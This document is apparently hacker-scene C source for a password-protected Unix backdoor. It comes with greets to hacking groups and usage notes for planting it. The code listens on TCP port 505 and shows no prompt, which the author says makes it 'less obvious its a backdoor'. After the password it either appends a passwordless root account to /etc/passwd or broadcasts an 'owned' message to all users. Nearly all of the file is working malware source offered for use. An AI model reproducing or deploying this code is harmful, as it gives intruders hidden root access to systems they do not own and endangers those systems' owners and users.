/* 
A rip off a sockets tutorial i found somewhere cause I didn't feel like
writing stupid basic sockets code when I had it in my src directory
already.   
*/ 

/* Greets:
	Undernet Channels:
		#rootworm, #hacktech, #hyperlink, #3xposure, #legionoot
	Groups:
		The LegionOOT (www.legionoot.cc), Team Sploit
	People:
		Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t,
		F-o-X, NeonMatrix, Azmodan, & Venomous
/* 

Usage (setup):
	# gcc -o backdoor backdoor.c
	# ./backdoor password &
Usage (using):
	telnet to host (port 505) --> type the password (don't wait for a
	prompt, there isn't one so its less obvious its a backdoor) -->
	type 1or 2.  And yes it's _supposed_ to disconnect you after
	each command.
*/

	 #include <stdio.h>
	 #include <stdlib.h>
	 #include <errno.h>
	 #include <string.h>
	 #include <sys/types.h>
	 #include <netinet/in.h>
	 #include <sys/socket.h>
	 #include <sys/wait.h>
#define PORT 505
#define MAXDATASIZE 100
#define BACKLOG 10

void handle(char *command);
int main(int argc, char *argv[])
{
int sockfd, new_fd, sin_size, numbytes;
char *bytes;
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
char buf[MAXDATASIZE];
char ask[]="Enter Command (1 to put r00t::0:0:... in /etc/passwd, 2 to
send '7h1s b0x 1s 0wn3d' to all people on the box: ";
	if (argc != 2) {
		fprintf(stderr,"Usage: %s password\n", argv[0]);
		exit(1);
	}
	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		perror("socket");
		exit(1);
	}
	my_addr.sin_family = AF_INET;
	my_addr.sin_port = htons(PORT);
	my_addr.sin_addr.s_addr = INADDR_ANY;
	if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1)
	{
		perror("bind");
		exit(1);
	}
			  if (listen(sockfd, BACKLOG) == -1) {
				perror("listen");
				exit(1);
		  }

		  while(1) {  /* main accept() loop */
				sin_size = sizeof(struct sockaddr_in);
				if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr,
																			 &sin_size)) ==
-1) {
					 perror("accept");
					 continue;
				}

inet_ntoa(their_addr.sin_addr);
				if (!fork()) {
					 recv(new_fd, buf,
MAXDATASIZE, 0);
				bytes = strstr(buf, argv[1]);
 
if (bytes != NULL){
					send(new_fd, ask, sizeof(ask), 0);
					numbytes=recv(new_fd, buf,
MAXDATASIZE, 0);
					buf[numbytes] = '\0';
					handle(buf);
					 }
					 close(new_fd);
					 exit(0);
				}
				close(new_fd);

				while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child
processes */
	 }
}

void handle(char *command)
{
	FILE *fle;
	if(strstr(command, "1") != NULL)
	{
		fle = fopen("/etc/passwd", "a+");
		fprintf(fle, "r00t::0:0:r00t:/root:/bin/bash");
		fclose(fle);
	}
	if(strstr(command, "2") != NULL)
	{
		system("wall 7h1s b0x 1s 0wn3d");
	}
}